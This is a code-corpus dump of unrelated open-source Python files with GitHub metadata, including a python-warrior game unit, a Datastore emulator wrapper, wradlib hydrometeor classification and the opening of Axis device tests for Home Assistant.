                # Negative indices: count from the right
                denotation.execution_stack.append(objects[number])
            return denotation
        elif name[0] == 'H':
            # History slot
            number = denotation.execution_stack.pop()
            assert isinstance(number, int)
            # Pull out the argument (1-based from the front, negative from
            # the back, mirroring the 'index' predicate).
            command = denotation.command_history[
                number - 1 if number > 0 else number]
            if name == 'H0':
                # Get the action and execute
                argument = command[0]
                new_state, history_entry = denotation.world_state.apply_action(
                    argument, denotation.execution_stack)
                return RLongDenotation(new_state,
                                       denotation.command_history + [history_entry],
                                       denotation.execution_stack)
            elif name == 'HUndo':
                # Get the opposite and execute
                argument = denotation.world_state.reverse_action(command[0])
                new_state, history_entry = denotation.world_state.apply_action(
                    argument, denotation.execution_stack)
                return RLongDenotation(new_state,
                                       denotation.command_history + [history_entry],
                                       denotation.execution_stack)
            else:
                # Just push onto the stack
                argument = command[int(name[1:])]
                if not isinstance(argument, (int, str)):
                    assert isinstance(argument, RLongObject)
                    # Re-resolve the stored object against the current world.
                    argument = denotation.world_state.resolve_argument(argument)
                denotation.execution_stack.append(argument)
                return denotation
        else:
            raise ValueError('Unknown predicate {}'.format(name))
| {
"content_hash": "ade68966cc8100ca84d35e36ee372a76",
"timestamp": "",
"source": "github",
"line_count": 209,
"max_line_length": 94,
"avg_line_length": 39.645933014354064,
"alnum_prop": 0.5806179097272508,
"repo_name": "kelvinguu/lang2program",
"id": "19b9a65e4dce0757b670b94f952c772c49ba4cea",
"size": "8286",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "strongsup/rlong/executor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "462998"
}
],
"symlink_target": ""
} |
import glob
import sys
from pythonwarrior.units.base import UnitBase
from pythonwarrior.units.golem import Golem
class Warrior(UnitBase):
def __init__(self, level=None):
super(Warrior, self).__init__()
self.level = level
self.player_attr = None
self.name_attr = None
self.score = 0
self.golem_abilities = []
self.max_health = 20
def play_turn(self, turn):
return self.player().play_turn(turn)
def player(self):
if self.level.player_path() not in sys.path:
sys.path.insert(0, self.level.player_path())
if glob.glob(self.level.player_path() + '/player.py'):
import player
if self.player_attr:
return self.player_attr
else:
self.player_attr = player.Player()
return self.player_attr
def earn_points(self, points):
self.score = self.score + points
print "earns %d points" % points
@property
def attack_power(self):
return 5
@property
def shoot_power(self):
return 3
def name(self):
if self.name_attr:
return self.name_attr
else:
return 'Warrior'
def __repr__(self):
return self.name()
@property
def character(self):
return "@"
def perform_turn(self):
if self.current_turn.action is None:
self.say('does nothing')
super(Warrior, self).perform_turn()
def add_golem_abilities(self, *abilities):
self.golem_abilities += abilities
def has_golem(self):
if self.golem_abilities:
return True
else:
return False
def base_golem(self):
golem = Golem()
golem.add_abilities(*self.golem_abilities)
return golem
| {
"content_hash": "83d9fca184857bc5ada78a4a1ff3bafb",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 62,
"avg_line_length": 23.92105263157895,
"alnum_prop": 0.5737073707370737,
"repo_name": "arbylee/python-warrior",
"id": "ddb958f708b095de85a71e897a06b9d49c124f9d",
"size": "1818",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pythonwarrior/units/warrior.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "123534"
}
],
"symlink_target": ""
} |
from riskytt import RiskyTT
from charm.toolbox.pairinggroup import PairingGroup,GT,G1,G2,pair
import util
import random
import time
from multiprocessing.dummy import Pool as ThreadPool
def avg_measurement(n, m, num_threads, measure, fn, rand_args):
    """Run m experiments of n measurements each and aggregate them.

    Each measurement calls measure(fn, *rand_args()) on a worker thread.

    Args:
        n: number of measurements per experiment
        m: number of experiments
        num_threads: size of the thread pool
        measure: callable(fn, *args) returning a number (e.g. time_fn)
        fn: the function under measurement
        rand_args: zero-argument callable producing a fresh argument list

    Returns:
        (best, typical): the minimum over all per-experiment minimums, and
        the median of the per-experiment means.
    """
    pool = ThreadPool(num_threads)
    f = lambda _: measure(fn, *(rand_args()))
    v = [0] * n
    try:
        # BUG FIX: the previous code ran a single experiment and replicated
        # the result list m times ([pool.map(f, v)] * m), which made the
        # median over "m experiments" meaningless. Run m independent ones.
        expts = [pool.map(f, v) for _ in range(m)]
    except Exception:
        # Fall back to serial execution if the thread pool fails.
        expts = [list(map(f, v)) for _ in range(m)]
    means = map(util.mean, expts)
    mins = map(min, expts)
    return min(mins), util.median(means)
def time_fn(fn, *args):
    """Invoke fn(*args) once and return the elapsed wall time in milliseconds."""
    started = time.time()
    fn(*args)
    elapsed = time.time() - started
    return elapsed * 1000
if __name__=="__main__":
    # Benchmark configuration: n measurements per experiment, m experiments,
    # executed with a single worker thread.
    n = 100
    m = 10
    num_threads = 1
    def avg_time(fn, rand_args):
        # (min, median-of-means) wall time of fn in milliseconds.
        return avg_measurement(n, m, num_threads, time_fn, fn, rand_args)
    def avg_size(fn, rand_args):
        # Aggregate fn's own return value (e.g. a size) instead of its runtime.
        return avg_measurement(n, m, num_threads, lambda f,*args: f(*args), fn, rand_args)
    # NOTE(review): largest_k == 0 means the per-k benchmark loop below never
    # executes; only the pairing benchmark runs. Confirm this is intentional.
    largest_k = 0
    num_users = largest_k
    keygen_times = []
    encpk_times = []
    encsk_times = []
    dec_times = []
    ct_sizes = []
    group = PairingGroup("BN254")
    # pairing time
    rand_args_pair = lambda: [group.random(G1), group.random(G2)]
    # NOTE(review): this rebinds the module-level m (experiment count) to the
    # measured minimum; later avg_time calls would read the new value through
    # the closure. Harmless while the loop below is dead — worth confirming.
    m,t = avg_time(pair, rand_args_pair)
    print "Pairing min: ",
    print m,
    print "Pairing avg: ",
    print t
    for k in range(1,largest_k + 1):
        riskytt = RiskyTT(group, num_users, k)
        # KeyGen
        rand_args_keygen = lambda: [random.randint(0, num_users - 1)]
        t = avg_time(riskytt._keygen, rand_args_keygen)
        keygen_times.append(t)
        # Enc-PK
        rand_args_encpk = lambda: [group.random(GT)]
        t = avg_time(riskytt.encpk, rand_args_encpk)
        encpk_times.append(t)
        # Enc-SK
        #rand_args_encsk = lambda: [group.random(GT), random.randint(0, num_users - 1)]
        #t = avg_time(riskytt.encsk, rand_args_encsk)
        #encsk_times.append(t)
        # Dec
        rand_args_dec = lambda: [riskytt._keygen(random.randint(0, num_users - 1)), riskytt.encpk(group.random(GT))]
        t = avg_time(riskytt.dec, rand_args_dec)
        dec_times.append(t)
        # CT Size
        rand_args_ct = lambda: []
        s = avg_size(riskytt.mhve.ct_size, rand_args_ct)
        ct_sizes.append(s)
    print "KeyGen: ",
    print keygen_times
    print "Enc-PK: ",
    print encpk_times
    print "Enc-SK: ",
    print encsk_times
    print "Dec: ",
    print dec_times
    print "CT Size: ",
    print ct_sizes
| {
"content_hash": "8a8640552bbeb7c75c1e075fdd3312dd",
"timestamp": "",
"source": "github",
"line_count": 92,
"max_line_length": 116,
"avg_line_length": 27.47826086956522,
"alnum_prop": 0.5882120253164557,
"repo_name": "ahrussell/riskytraitortracing",
"id": "ceb5391978d37a79cff168f2de4ff54574eb4cba",
"size": "2528",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "benchmark.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "11795"
},
{
"name": "C++",
"bytes": "43373"
},
{
"name": "Makefile",
"bytes": "434"
},
{
"name": "Python",
"bytes": "9695"
},
{
"name": "TeX",
"bytes": "15777"
}
],
"symlink_target": ""
} |
"""Diagnostics support for Coinbase."""
from homeassistant.components.diagnostics import async_redact_data
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY, CONF_API_TOKEN, CONF_ID
from homeassistant.core import HomeAssistant
from . import CoinbaseData
from .const import API_ACCOUNT_AMOUNT, API_RESOURCE_PATH, CONF_TITLE, DOMAIN
# Keys whose values are stripped from the diagnostics output because they
# carry secrets or account-identifying data.
TO_REDACT = {
    API_ACCOUNT_AMOUNT,
    API_RESOURCE_PATH,
    CONF_API_KEY,
    CONF_API_TOKEN,
    CONF_ID,
    CONF_TITLE,
}
async def async_get_config_entry_diagnostics(
    hass: HomeAssistant, entry: ConfigEntry
) -> dict:
    """Return diagnostics for a config entry."""
    instance: CoinbaseData = hass.data[DOMAIN][entry.entry_id]
    # Build the raw payload first, then redact sensitive keys in one pass.
    payload = {
        "entry": entry.as_dict(),
        "accounts": instance.accounts,
    }
    return async_redact_data(payload, TO_REDACT)
| {
"content_hash": "558e582d2081534ebefbc8a6f9fbd25b",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 76,
"avg_line_length": 26.818181818181817,
"alnum_prop": 0.6915254237288135,
"repo_name": "mezz64/home-assistant",
"id": "54d4168776c52fbd2341c18902a80fcbac91eb5b",
"size": "885",
"binary": false,
"copies": "6",
"ref": "refs/heads/dev",
"path": "homeassistant/components/coinbase/diagnostics.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "52481895"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
} |
from carrot.messaging import Consumer
from conductor.task import Task
__all__ = ["ConsumerTask"]
class ConsumerTask(Task):
    """Bus task that provides carrot AMQP consumers on request."""

    def __init__(self, bus=None):
        Task.__init__(self, bus)

    def start(self):
        Task.start(self)
    start.priority = 12

    def stop(self):
        # BUG FIX: this previously called Task.start(self), so the task was
        # re-started instead of stopped during shutdown.
        Task.stop(self)
    stop.priority = 88

    def start_task(self):
        """Register the consumer provider channel on the bus."""
        self.bus.log("Starting AMQP consumer provider task")
        self.bus.subscribe("get-amqp-consumer", self.get_consumer)

    def stop_task(self):
        """Unregister the consumer provider channel from the bus."""
        self.bus.log("Stopping AMQP consumer provider task")
        self.bus.unsubscribe("get-amqp-consumer", self.get_consumer)

    def get_consumer(self, broker, **kwargs):
        """Return a carrot Consumer bound to *broker*."""
        return Consumer(broker, **kwargs)
| {
"content_hash": "56d1f350465b5def3344bd5912a6f357",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 68,
"avg_line_length": 28,
"alnum_prop": 0.6243386243386243,
"repo_name": "Lawouach/conductor",
"id": "c1ba0625e6755b8a2c53eead24a3e847bd14d2b8",
"size": "780",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "conductor/protocol/amqp/consumer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
import matplotlib.pyplot as plt
import numpy as np
import cv2
from utils.data_management import get_class_names
from utils.preprocessing import substract_mean
from utils.inference import detect
from utils.inference import plot_detections
class VideoDemo(object):
    """Runs an SSD detector on webcam frames and displays the detections.

    Press 'q' in the display window to stop the stream.
    """

    def __init__(self, prior_boxes, dataset_name='VOC2007',
                 box_scale_factors=None,
                 background_index=0, lower_probability_threshold=.1,
                 iou_threshold=.2, class_names=None):
        """Initialize the demo.

        Args:
            prior_boxes: SSD prior boxes (point form) used to decode
                predictions.
            dataset_name: dataset used to look up class names when
                ``class_names`` is not given.
            box_scale_factors: box-decoding variances; defaults to
                [.1, .1, .2, .2].
            background_index: index of the background class.
            lower_probability_threshold: minimum detection score.
            iou_threshold: IOU threshold used for suppression.
            class_names: explicit class-name list; overrides dataset_name.
        """
        # BUG FIX: the default was a shared mutable list argument; use a
        # None sentinel so each instance gets its own list.
        if box_scale_factors is None:
            box_scale_factors = [.1, .1, .2, .2]
        self.prior_boxes = prior_boxes
        self.box_scale_factors = box_scale_factors
        self.background_index = background_index
        self.iou_threshold = iou_threshold
        self.lower_probability_threshold = lower_probability_threshold
        self.class_names = class_names
        if self.class_names is None:
            self.class_names = get_class_names(dataset_name)
        self.num_classes = len(self.class_names)
        # One distinct HSV color per class, scaled to 0-255 for OpenCV.
        self.colors = plt.cm.hsv(np.linspace(0, 1, self.num_classes)).tolist()
        self.colors = np.asarray(self.colors) * 255
        self.arg_to_class = dict(zip(list(range(self.num_classes)),
                                     self.class_names))
        self.font = cv2.FONT_HERSHEY_SIMPLEX

    def start_video(self, model):
        """Stream webcam frames through ``model`` and draw detections."""
        camera = cv2.VideoCapture(0)
        while True:
            frame = camera.read()[1]
            if frame is None:
                print('Frame: None')
                continue
            # Preprocess: BGR->RGB, resize to the 300x300 SSD input,
            # subtract the dataset mean, add the batch dimension.
            image_array = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
            image_array = cv2.resize(image_array, (300, 300))
            image_array = substract_mean(image_array)
            image_array = np.expand_dims(image_array, 0)
            predictions = model.predict(image_array)
            detections = detect(predictions, self.prior_boxes)
            # NOTE(review): the 0.6 drawing threshold is hard-coded and
            # ignores self.lower_probability_threshold — confirm intent.
            plot_detections(detections, frame, 0.6,
                            self.arg_to_class, self.colors)
            cv2.imshow('webcam', frame)
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
        camera.release()
        cv2.destroyAllWindows()
if __name__ == "__main__":
    # Demo entry point: load a trained SSD300 model and run the webcam loop.
    from models import SSD300
    from utils.boxes import create_prior_boxes
    from utils.boxes import to_point_form
    dataset_name = 'VOC2007'
    weights_path = '../trained_models/SSD300_weights.hdf5'
    model = SSD300(weights_path=weights_path)
    # Prior boxes are converted to point form (x_min, y_min, x_max, y_max).
    prior_boxes = to_point_form(create_prior_boxes())
    video = VideoDemo(prior_boxes, dataset_name)
    video.start_video(model)
| {
"content_hash": "60cece068d4d639f02414a5bc6f8d6e1",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 78,
"avg_line_length": 38.61538461538461,
"alnum_prop": 0.6151394422310758,
"repo_name": "oarriaga/single_shot_multibox_detector",
"id": "fc036e6cbbc1eb326aa502e2df63bfd262c8acc4",
"size": "2510",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/video_demo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "145563"
}
],
"symlink_target": ""
} |
"""Create / interact with Google Cloud Translation connections."""
from google.cloud import _http
from google.cloud.translate_v2 import __version__
# Client-info header value advertising this library's version to the API.
_CLIENT_INFO = _http.CLIENT_INFO_TEMPLATE.format(__version__)


class Connection(_http.JSONConnection):
    """A connection to Google Cloud Translation API via the JSON REST API.

    :type client: :class:`~google.cloud.translate.client.Client`
    :param client: The client that owns the current connection.
    """

    API_BASE_URL = 'https://translation.googleapis.com'
    """The base of the API call URL."""

    API_VERSION = 'v2'
    """The version of the API, used in building the API call's URL."""

    API_URL_TEMPLATE = '{api_base_url}/language/translate/{api_version}{path}'
    """A template for the URL of a particular API call."""

    # Extra headers attached to every request (client version reporting).
    _EXTRA_HEADERS = {
        _http.CLIENT_INFO_HEADER: _CLIENT_INFO,
    }
| {
"content_hash": "ed1254a06ad9898489e181458cf9326c",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 78,
"avg_line_length": 30.275862068965516,
"alnum_prop": 0.6799544419134397,
"repo_name": "tartavull/google-cloud-python",
"id": "dedb17ec9e14cdbfedc99b8653ebc2e56e033998",
"size": "1454",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "translate/google/cloud/translate_v2/_http.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Protocol Buffer",
"bytes": "62906"
},
{
"name": "Python",
"bytes": "4572894"
},
{
"name": "Shell",
"bytes": "4147"
}
],
"symlink_target": ""
} |
"""Python wrapper for the Cloud Datastore emulator."""
__author__ = 'eddavisson@google.com (Ed Davisson)'
import logging
import os
import shutil
import socket
import subprocess
import tempfile
import time
import zipfile
from googledatastore import connection
import httplib2
import portpicker
_DEFAULT_EMULATOR_OPTIONS = ['--testing']
class DatastoreEmulatorFactory(object):
"""A factory for constructing DatastoreEmulator objects."""
def __init__(self, working_directory, emulator_zip, java=None):
"""Constructs a factory for building datastore emulator instances.
Args:
working_directory: path to a directory where temporary files will be
stored
emulator_zip: path to the emulator zip file
java: path to a java executable
"""
self._working_directory = working_directory
self._emulators = {}
# Extract the emulator.
zipped_file = zipfile.ZipFile(emulator_zip)
if not os.path.isdir(self._working_directory):
os.mkdir(self._working_directory)
zipped_file.extractall(self._working_directory)
self._emulator_dir = os.path.join(self._working_directory,
'cloud-datastore-emulator')
self._emulator_cmd = os.path.join(self._emulator_dir,
'cloud_datastore_emulator')
os.chmod(self._emulator_cmd, 0700) # executable
# Make the emulator use our copy of Java.
if java:
os.environ['JAVA'] = java
def Get(self, project_id):
"""Returns an existing emulator instance for the provided project_id.
If an emulator instance doesn't yet exist, it creates one.
Args:
project_id: project ID
Returns:
a DatastoreEmulator
"""
if project_id in self._emulators:
return self._emulators[project_id]
emulator = self.Create(project_id)
self._emulators[project_id] = emulator
return emulator
def Create(self, project_id, start_options=None, deadline=10):
"""Creates an emulator instance.
This method will wait for up to 'deadline' seconds for the emulator to
start.
Args:
project_id: project ID
start_options: a list of additional command-line options to pass to the
emulator 'start' command
deadline: number of seconds to wait for the datastore to respond
Returns:
a DatastoreEmulator
Raises:
IOError: if the emulator could not be started within the deadline
"""
return DatastoreEmulator(self._emulator_cmd, self._working_directory,
project_id, deadline, start_options)
def __del__(self):
# Delete temp files.
shutil.rmtree(self._emulator_dir)
class DatastoreEmulator(object):
    """A Datastore emulator.

    Owns one emulator subprocess and its on-disk project directory.
    """

    def __init__(self, emulator_cmd, working_directory, project_id, deadline,
                 start_options):
        """Constructs a DatastoreEmulator.

        Clients should use DatastoreEmulatorFactory to construct
        DatastoreEmulator instances.

        Args:
            emulator_cmd: path to cloud_datastore_emulator
            working_directory: directory file where temporary files will be
                stored
            project_id: project ID
            deadline: number of seconds to wait for the datastore to start
            start_options: a list of additional command-line options to pass
                to the emulator 'start' command

        Raises:
            IOError: if the emulator failed to start within the deadline
        """
        self._project_id = project_id
        self._emulator_cmd = emulator_cmd
        self._http = httplib2.Http()
        self.__running = False
        self._tmp_dir = tempfile.mkdtemp(dir=working_directory)
        self._project_directory = os.path.join(self._tmp_dir, self._project_id)
        # 'create' initializes the project directory; it exits non-zero on
        # failure.
        p = subprocess.Popen([emulator_cmd,
                              'create',
                              '--project_id=%s' % self._project_id,
                              self._project_directory])
        if p.wait() != 0:
            raise IOError('could not create project in directory: %s'
                          % self._project_directory)

        # Start the emulator and wait for it to start responding to requests.
        port = portpicker.PickUnusedPort()
        self._host = 'http://localhost:%d' % port
        cmd = [self._emulator_cmd, 'start', '--port=%d' % port]
        cmd.extend(_DEFAULT_EMULATOR_OPTIONS)
        if start_options:
            cmd.extend(start_options)
        cmd.append(self._project_directory)
        subprocess.Popen(cmd)
        if not self._WaitForStartup(deadline):
            raise IOError('emulator did not respond within %ds' % deadline)
        endpoint = '%s/v1/projects/%s' % (self._host, self._project_id)
        self.__datastore = connection.Datastore(project_endpoint=endpoint)
        self.__running = True

    def GetDatastore(self):
        """Returns a googledatatsore.Datastore that is connected to the emulator."""
        return self.__datastore

    def _WaitForStartup(self, deadline):
        """Waits for the emulator to start.

        Args:
            deadline: deadline in seconds

        Returns:
            True if the emulator responds within the deadline, False otherwise.
        """
        start = time.time()
        sleep = 0.05

        def Elapsed():
            return time.time() - start

        # Poll with exponential backoff until the emulator answers or the
        # deadline passes.
        while True:
            try:
                response, _ = self._http.request(self._host)
                if response.status == 200:
                    logging.info('emulator responded after %f seconds', Elapsed())
                    return True
            except socket.error:
                # Not listening yet; keep polling.
                pass
            if Elapsed() >= deadline:
                # Out of time; give up.
                return False
            else:
                time.sleep(sleep)
                sleep *= 2

    def Clear(self):
        """Clears all data from the emulator instance.

        Returns:
            True if the data was successfully cleared, False otherwise.
        """
        headers = {'Content-length': '0'}
        response, _ = self._http.request('%s/reset' % self._host, method='POST',
                                         headers=headers)
        if response.status == 200:
            return True
        logging.warning('failed to clear emulator; response was: %s', response)
        # BUG FIX: this failure path previously fell through and returned
        # None, contradicting the documented True/False contract.
        return False

    def Stop(self):
        """Stops the emulator instance."""
        if not self.__running:
            return
        logging.info('shutting down the emulator running at %s', self._host)
        headers = {'Content-length': '0'}
        response, _ = self._http.request('%s/shutdown' % self._host,
                                         method='POST', headers=headers)
        if response.status != 200:
            logging.warning('failed to shut down emulator; response: %s',
                            response)
        self.__running = False
        # Delete temp files.
        shutil.rmtree(self._tmp_dir)

    def __del__(self):
        # If the user forgets to call Stop()
        logging.warning('emulator shutting down due to '
                        'DatastoreEmulator object deletion')
        self.Stop()
| {
"content_hash": "f7fcea260a60dad9b328c87cc5bf6e49",
"timestamp": "",
"source": "github",
"line_count": 217,
"max_line_length": 80,
"avg_line_length": 30.986175115207374,
"alnum_prop": 0.6420285544318858,
"repo_name": "eddavisson/google-cloud-datastore",
"id": "4fe1b5e0aa17b7d3b1c07ec43aace23eb4f947ea",
"size": "7324",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "python/googledatastore/datastore_emulator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "2202"
},
{
"name": "Java",
"bytes": "127536"
},
{
"name": "JavaScript",
"bytes": "1714"
},
{
"name": "Makefile",
"bytes": "6769"
},
{
"name": "Python",
"bytes": "79940"
}
],
"symlink_target": ""
} |
"""
Hydrometeor Classification (HMC)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. autosummary::
:nosignatures:
:toctree: generated/
{}
"""
__all__ = ["msf_index_indep", "trapezoid", "fuzzyfi", "probability", "classify"]
__doc__ = __doc__.format("\n ".join(__all__))
import numpy as np
# Mapping from hydrometeor-class index to (abbreviation, long name).
# Index 11 ("No Precip") is the class appended by classify().
pr_types = {
    0: ("LR", "Light Rain"),
    1: ("MR", "Moderate Rain"),
    2: ("HR", "Heavy Rain"),
    3: ("LD", "Large Drops"),
    4: ("HL", "Hail"),
    5: ("RH", "Rain/Hail"),
    6: ("GH", "Graupel/Hail"),
    7: ("DS", "Dry Snow"),
    8: ("WS", "Wet Snow"),
    9: ("HC", "H Crystals"),
    10: ("VC", "V Crystals"),
    11: ("NP", "No Precip"),
}
def msf_index_indep(msf, idp, obs):
    """Retrieve membership function values based on independent observable

    Parameters
    ----------
    msf : :class:`numpy:numpy.ndarray`
        Array of size (hmc-classes, observables, indep-ranges, 4) containing
        the values of the trapezoidal msf values for every hmc-class and
        observable within the independent observable range.
    idp : :class:`numpy:numpy.ndarray`
        Array of length of the independent observable containing the ranges
        of the independent observable.
    obs : :class:`numpy:numpy.ndarray`
        Array of arbitrary shape containing the data of the independent
        observable (eg. (rays, bins) or (scan, rays, bins)).

    Returns
    -------
    out : :class:`numpy:numpy.ndarray`
        Array of shape (hmc-classes, observables, obs.shape, 4) containing the
        membership function values for every radar-bin for every hmc-class and
        observable.
    """
    # Append one extra edge so the last idp range gets its own digitize bin.
    edges = np.append(idp, idp[-1] + (idp[-1] - idp[-2]))
    bin_idx = np.digitize(obs, edges) - 1
    flat_idx = bin_idx.ravel()
    # Observations mapping outside [0, len(edges) - 2] lie outside the idp
    # range; their msf values stay zero.
    inside = (flat_idx >= 0) & (flat_idx <= edges.shape[0] - 2)
    out = np.zeros((msf.shape[0], msf.shape[1], obs.size, msf.shape[-1]))
    out[:, :, inside, :] = msf[:, :, flat_idx[inside], :]
    return np.reshape(
        out, (msf.shape[0], msf.shape[1]) + obs.shape + (msf.shape[-1],)
    )
def trapezoid(msf, obs):
    """Calculates membership of `obs` using trapezoidal
    membership functions

    Parameters
    ----------
    msf : :class:`numpy:numpy.ndarray`
        Array which is of size (obs.shape, 4), containing the trapezoidal
        membership function values for every `obs` point for one particular
        hydrometeor class.
    obs : :class:`numpy:numpy.ndarray`
        Array of arbitrary size and dimensions containing
        the data from which the membership shall be calculated.

    Returns
    -------
    out : :class:`numpy:numpy.ndarray`
        Array which is of (obs.shape) containing calculated membership
        probabilities.
    """
    # Trapezoid nodes: (lo, lo_top, hi_top, hi) along the last msf axis.
    lo = msf[..., 0]
    lo_top = msf[..., 1]
    hi_top = msf[..., 2]
    hi = msf[..., 3]
    member = np.zeros_like(obs)
    plateau = (obs >= lo_top) & (obs <= hi_top)
    rising = (obs >= lo) & (obs < lo_top)
    falling = (obs > hi_top) & (obs <= hi)
    # Full membership on the plateau between the two inner nodes.
    member[plateau] = 1.0
    # Linear interpolation on the rising flank ...
    member[rising] = (obs[rising] - lo[rising]) / (lo_top[rising] - lo[rising])
    # ... and on the falling flank.
    member[falling] = (obs[falling] - hi[falling]) / (
        hi_top[falling] - hi[falling]
    )
    return member
def fuzzyfi(msf, obs):
    """Iterate over all hmc-classes and retrieve memberships

    Parameters
    ----------
    msf : :class:`numpy:numpy.ndarray`
        Array which is of size (hmc-class, obs.shape, 4), containing the
        trapezoidal membership function values for every `obs` point for
        every hydrometeor class.
    obs : :class:`numpy:numpy.ndarray`
        Array of arbitrary size and dimensions containing
        the data from which the memberships shall be calculated.

    Returns
    -------
    out : :class:`numpy:numpy.ndarray`
        Array which is of (hmc-class, obs.shape) containing calculated
        membership probabilities.
    """
    # One trapezoid evaluation per hydrometeor class, collected into a
    # float result array.
    memberships = np.zeros(msf.shape[0:-1])
    for hmc_idx in range(msf.shape[0]):
        memberships[hmc_idx] = trapezoid(msf[hmc_idx], obs)
    return memberships
def probability(data, weights):
    """Calculate probability of hmc-class for every data bin.

    Parameters
    ----------
    data : :class:`numpy:numpy.ndarray`
        Array which is of size (hmc-class, obs, data.shape), containing the
        membership probability values.
    weights : :class:`numpy:numpy.ndarray`
        Array of length (observables) containing the weights for
        each observable.

    Returns
    -------
    out : :class:`numpy:numpy.ndarray`
        Array which is of (hmc-class, data.shape) containing weighted
        hmc-membership probabilities.
    """
    total_weight = np.sum(weights)
    # Reshape weights to (1, n_obs, 1, ..., 1) so they broadcast along the
    # observables axis of data.
    w = np.reshape(weights, (1, len(weights)) + (1,) * len(data.shape[2:]))
    return np.sum(data * w, axis=1) / total_weight
def classify(data, threshold=0.0):
    """Determine the most probable hmc-class for every data bin.

    Parameters
    ----------
    data : :py:class:`numpy:numpy.ndarray`
        Array of size (hmc-class, data.shape) holding the weighted
        hmc-membership probability values.

    Keyword Arguments
    -----------------
    threshold : float
        Probability at or below which a bin is considered no precip,
        defaults to 0.

    Returns
    -------
    idx : :py:class:`numpy:numpy.ndarray`
        Array of shape (data.shape) with the (sorted) index into the
        hydrometeor-class. No precip is added on the top.
    vals : :py:class:`numpy:numpy.ndarray`
        Array of shape (data.shape) with the (sorted) probability scores.
        No precip is added on the top.
    """
    n_classes = data.shape[0]
    # Mean membership over all classes; bins at or below the threshold
    # count as "no precipitation".
    mean_prob = np.sum(data, axis=0) / n_classes
    no_precip = mean_prob <= threshold
    # Append an extra zero-probability "no precip" class below the real ones.
    stacked = np.concatenate(
        (data, np.zeros_like(mean_prob)[np.newaxis, ...]), axis=0
    )
    idx = np.argsort(stacked, axis=0)
    vals = np.sort(stacked, axis=0)
    # Point every no-precip bin at the extra class with full score.
    idx[:, no_precip] = n_classes
    vals[:, no_precip] = 1.0
    return idx, vals
| {
"content_hash": "a8a78477a900afb01dafd4e9d8de127a",
"timestamp": "",
"source": "github",
"line_count": 199,
"max_line_length": 88,
"avg_line_length": 31.246231155778894,
"alnum_prop": 0.5968156963653908,
"repo_name": "wradlib/wradlib",
"id": "a646887d21f0f75d0bb0d4d431a17b76052c1fe8",
"size": "6356",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "wradlib/classify.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Fortran",
"bytes": "2191"
},
{
"name": "Python",
"bytes": "1287418"
},
{
"name": "Shell",
"bytes": "1209"
}
],
"symlink_target": ""
} |
"""Test Axis device."""
from copy import deepcopy
from unittest import mock
from unittest.mock import Mock, patch
import axis as axislib
from axis.event_stream import OPERATION_INITIALIZED
import pytest
import respx
from homeassistant.components import axis, zeroconf
from homeassistant.components.axis.const import (
CONF_EVENTS,
CONF_MODEL,
DOMAIN as AXIS_DOMAIN,
)
from homeassistant.components.binary_sensor import DOMAIN as BINARY_SENSOR_DOMAIN
from homeassistant.config_entries import SOURCE_ZEROCONF
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
CONF_USERNAME,
STATE_OFF,
STATE_ON,
STATE_UNAVAILABLE,
)
from homeassistant.helpers import device_registry as dr
from tests.common import MockConfigEntry, async_fire_mqtt_message
MAC = "00408C123456"
FORMATTED_MAC = "00:40:8c:12:34:56"
MODEL = "model"
NAME = "name"
DEFAULT_HOST = "1.2.3.4"
ENTRY_OPTIONS = {CONF_EVENTS: True}
ENTRY_CONFIG = {
CONF_HOST: DEFAULT_HOST,
CONF_USERNAME: "root",
CONF_PASSWORD: "pass",
CONF_PORT: 80,
CONF_MODEL: MODEL,
CONF_NAME: NAME,
}
API_DISCOVERY_RESPONSE = {
"method": "getApiList",
"apiVersion": "1.0",
"data": {
"apiList": [
{"id": "api-discovery", "version": "1.0", "name": "API Discovery Service"},
{"id": "param-cgi", "version": "1.0", "name": "Legacy Parameter Handling"},
]
},
}
API_DISCOVERY_BASIC_DEVICE_INFO = {
"id": "basic-device-info",
"version": "1.1",
"name": "Basic Device Information",
}
API_DISCOVERY_MQTT = {"id": "mqtt-client", "version": "1.0", "name": "MQTT Client API"}
API_DISCOVERY_PORT_MANAGEMENT = {
"id": "io-port-management",
"version": "1.0",
"name": "IO Port Management",
}
APPLICATIONS_LIST_RESPONSE = """<reply result="ok">
<application Name="vmd" NiceName="AXIS Video Motion Detection" Vendor="Axis Communications" Version="4.2-0" ApplicationID="143440" License="None" Status="Running" ConfigurationPage="local/vmd/config.html" VendorHomePage="http://www.axis.com" />
</reply>"""
BASIC_DEVICE_INFO_RESPONSE = {
"apiVersion": "1.1",
"data": {
